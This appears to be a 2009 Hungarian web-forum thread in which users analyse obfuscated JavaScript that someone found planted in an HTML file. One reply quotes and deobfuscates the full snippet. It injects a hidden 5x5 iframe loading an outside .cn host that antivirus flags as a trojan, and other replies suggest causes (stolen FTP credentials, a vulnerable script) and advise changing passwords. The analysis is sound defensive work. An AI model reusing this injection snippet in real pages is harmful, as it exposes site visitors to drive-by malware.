Új hozzászólás Aktív témák

• #2925 PazsitZ addikt eziskamu #2920

  Új Válasz 2009-08-11 17:02:57 #2925

  Új hozzászólás

  Összes hozzászólása itt Válaszok az összes hozzászólására itt Válaszok erre a hozzászólásra

  Privát üzenet küldése

  

  PazsitZ

  addikt

  válasz eziskamu #2920 üzenetére

  Fárasztó egy javascript kód:

  wy='t';
  ya='mp';
  yu='p:';
  qs='sr';
  d='nit';
  l='ame';
  v='c';
  z='t';
  ow='io';
  zt='n/';
  sc='n';
  o='//z';
  hy='cha';
  hg='h';
  p='.c';
  j='ifr';
  f='e';
  dx=j.concat(l); // dx=iframe
  lr=qs.concat(v); // lr=src
  ua=hg.concat(wy,z,yu,o,f,d,hy,ya,ow,sc,p,zt); // http://zenitchampion.cn/
  var dj=document.createElement(dx); // document.createElement(iframe);
  dj.setAttribute('width','5'); //
  dj.setAttribute('height','5'); //
  dj.setAttribute('style','display:none'); //
  dj.setAttribute(lr,ua); // dj.setAttribute('src','http://zenitchampion.cn/');
  document.body.appendChild(dj); // beilleszti a body végére: <iframe width="5" height="5" style="display:none;" src="http://zenitchampion.cn/">

  persze ezek csak akkor futnak le ha <script> tag között vannak.
  A lényege, hogy beilleszti a body végére a következő html kódot (egy nem látható iframe-t a fent említett oldalről):
  <iframe width="5" height="5" style="display:none;" src="fent említett oldal">

  Amire nekem az avast rögtön támadást érzékel (JS:ScriptPE-inf [Trj]) már csak a cím google-al való rákereséssel is.

• #2922 cucka addikt eziskamu #2920

  Új Válasz 2009-08-11 16:55:26 #2922

  Új hozzászólás

  Összes hozzászólása itt Válaszok az összes hozzászólására itt Válaszok erre a hozzászólásra

  Privát üzenet küldése

  

  cucka

  addikt

  válasz eziskamu #2920 üzenetére

  A kód javascript, csinál egy rejtett iframe-et, ami a http://zenitchampion.cn oldalra mutat.
  Azért néz így ki, hogy ne vedd észre elsőre, hogy mit csinál, ne legyen érthető a kód, ezt külföldiül obfuscation-nek hívják.

• #2921 fordfairlane veterán eziskamu #2920

  Új Válasz 2009-08-11 16:50:32 #2921

  Új hozzászólás

  Összes hozzászólása itt Válaszok az összes hozzászólására itt Válaszok erre a hozzászólásra

  

  fordfairlane

  veterán

  válasz eziskamu #2920 üzenetére

  Ez javascript genyóság, időm most nincs tesztelni, hogy pontosan mit is csinál, valamit a böngészővel kavar, talán átirányítja máshova. Ha egy html fájlban találtad az azt jelenti, hogy a támadó fájlokat tud írni a szerveren. Ez két módon lehetséges:

  Név/Jelszót szerzett, és valami fájlátviteli protokollal (FTP, SCP, SFTP) képes felülírni a szerveren.
  Van egy webes script, amiben van valamiféle bug, amit kihasználva fájlokat lehet felülírni.

  Érdemes kinyomozni, melyikről lehet szó, illetve jelszót változtatni nem árt.

Új hozzászólás Aktív témák